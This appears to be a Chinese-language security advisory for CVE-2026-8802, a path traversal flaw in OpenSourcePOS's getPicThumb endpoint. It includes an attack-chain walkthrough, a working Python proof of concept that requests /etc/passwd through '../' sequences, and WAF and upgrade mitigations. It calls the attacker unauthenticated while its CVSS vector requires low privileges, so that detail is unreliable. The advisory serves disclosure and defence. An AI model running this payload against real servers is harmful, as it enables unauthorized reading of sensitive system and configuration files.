CVE-2026-8802 CVSS 4.3 中危

CVE-2026-8802：OpenSourcePOS路径遍历漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8802

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

opensourcepos Open Source Point of Sale

漏洞概述

OpenSourcePOS 3.4.2及以下版本存在路径遍历漏洞。该漏洞源于`app/Controllers/Items.php`文件中`getPicThumb`函数未正确过滤`pic_filename`参数。未经授权的攻击者可利用此缺陷通过发送特制请求读取服务器上的敏感文件，造成严重的信息泄露风险。厂商已发布修复补丁，建议用户尽快更新。

技术细节

该漏洞的根源在于OpenSourcePOS应用在处理图片缩略图请求时，未能对用户输入的`pic_filename`参数实施有效的安全边界检查。具体而言，`app/Controllers/Items.php`控制器中的`getPicThumb`方法直接引用了该参数来构建文件路径，未使用`basename()`等函数进行净化，也未限制文件访问的基准目录。攻击者利用这一逻辑漏洞，可以在参数中插入目录遍历序列（如`../`），从而绕过目录限制，访问Web根目录之外的系统文件。由于CVSS评分显示攻击复杂度低且无需用户交互，攻击者只需具备低权限账户即可远程执行攻击，进而窃取配置文件、源代码或其他敏感数据，对系统安全构成威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标服务器正在运行OpenSourcePOS 3.4.2或更低版本。

STEP 2

2. 发起攻击

攻击者向`/index.php/items/getPicThumb`端点发送特制的HTTP GET请求，在`pic_filename`参数中插入路径遍历序列（如`../`）。

STEP 3

3. 路径解析

由于服务器端未对参数进行过滤，应用程序将恶意参数解析为绝对路径或相对路径，试图读取非预期目录下的文件。

STEP 4

4. 数据回显

服务器将请求的文件内容（如/etc/passwd等敏感文件）直接返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_url):
    """
    PoC for CVE-2026-8802 Path Traversal in OpenSourcePOS
    Attempts to read /etc/passwd using the vulnerable endpoint.
    """
    # The vulnerable endpoint might look like this depending on configuration
    url = f"{target_url}/index.php/items/getPicThumb"
    
    # Payload to traverse directories and read /etc/passwd
    # Adjust the number of '../' based on the actual installation depth
    params = {
        "pic_filename": "../../../../../../etc/passwd"
    }
    
    try:
        response = requests.get(url, params=params, timeout=10)
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Vulnerability confirmed! Sensitive file content:")
            print(response.text)
        else:
            print("[-] Vulnerability not confirmed or target patched.")
            print(f"Status Code: {response.status_code}")
            print(f"Response: {response.text[:200]}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost" # Replace with actual target
    exploit_poc(target)

影响范围

OpenSourcePOS <= 3.4.2

防御指南

临时缓解措施

建议立即检查系统版本，若受影响应尽快升级或应用官方补丁。在无法立即升级的情况下，可在Web应用防火墙（WAF）中添加规则，拦截对`getPicThumb`接口的请求或其中包含路径遍历字符（如`../`或`%2e%2e/`）的流量，以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表